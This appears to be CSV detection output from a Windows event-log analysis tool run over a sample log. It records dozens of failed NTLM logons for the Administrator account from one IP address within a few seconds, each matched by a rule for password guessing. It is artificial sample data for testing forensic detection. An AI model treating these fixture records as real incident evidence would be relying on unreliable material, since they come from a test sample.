+2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CjvAb3sjN0PM8my4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wYQ6HuRSMh8DXzMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SZgejUxgojDE1kR3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2L4yO411OUnkRGWQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O3mGCNGFML75P7w4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6CBslPz31UACz0wR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F4Y8V0wB6unpmFXA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aXSbx81GD6dYgHtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWbnppJfJ0Ll9oLW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eoUjizV5iXImPGTe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHNG9oylnT46IObg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1LUeAisNPQULjD2t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2sB5MlRw4Ox1OWdN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WaklWtKd8QByH8M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nzvyy6CUk43SVxZW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xeolvnD92qP1dJPO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KDvRwPbu6yQH2pEf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxKdofXKKkCLn2n6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IkO9p50Q9iFolbmb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p01SZCA784xmPMe2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XKaI3FHBbBXvVsES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmUk6sW8QreDIZZ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k0w9SSWaaTX7chM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 46vgsyX5Wxn2rupf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PV8628a8GNKoFyzM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mksBFEFzkC08dB4o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U6QlHT6Bp63JDehd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tRj4fxcRY0Esegl6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dj6zQjZwGEBo0zNt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: imfY1T2VMoaqDSUd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qvPP8UYn9fLpRYl4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rFTGQ5tzNI5k58cK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8Zj3g1WiTLx8OlJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x2Lr6j8Qt4xEmZZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BeDRsguCovO47lKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KqrDyaFTewMPSzD9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nBVMAki1Ghpknf6p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXKhNUmBUQBTyeNM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d1g9TVwsweaBfZgE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kWymb6ucohaBB60b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LjL0zwlZofVuWhGC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nxsdzkJdnaZs5eKL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PR6EpKvbqMeoQlKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OZ3LMTtsVNI1gRO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75bNeXwYSZPhJdJ7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lH6TVXSqJb1qLd3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: edDWye6c2UhKznR6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AxKUl1lynGY1ectn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vI5yUgukPBVRorJI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmR29QcBKMGVQ8rB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7luV5GfiT0v0h7D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yA7pIDFgQbLIInqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 84g2gO0253Ut4O1O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DRkFX9WTAhBZ8jc8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WuoQAi4k3XZPaf4O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KjKMhCnbR0uFT0av | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1lfwqPB0AgTfIOt4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mJuG26pQzdjUQael | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GXwEziYTA3DkkFVq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CHr6dirvkT8B9ZVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B5eSMLiF4BsfY3xN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 64ISDuFRhR6cFYVQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hcprXytyuBw380XY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxfQWiSIhZYxwNjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FcL982boDelzeyzK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBAAjRdaR8U0tqt7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EmqUjcltAW6StHQJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 129Rp3HCmRVRXw3C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jpIIQP2oWEF51EBI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HREGh5ppEkLAuEob | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UVkpQvotEMfM8R0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dm6uHEy5RJJBJ6FG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HPTyAkYjcIlko5lu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OjlRoo9Sot4Fx4Th | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
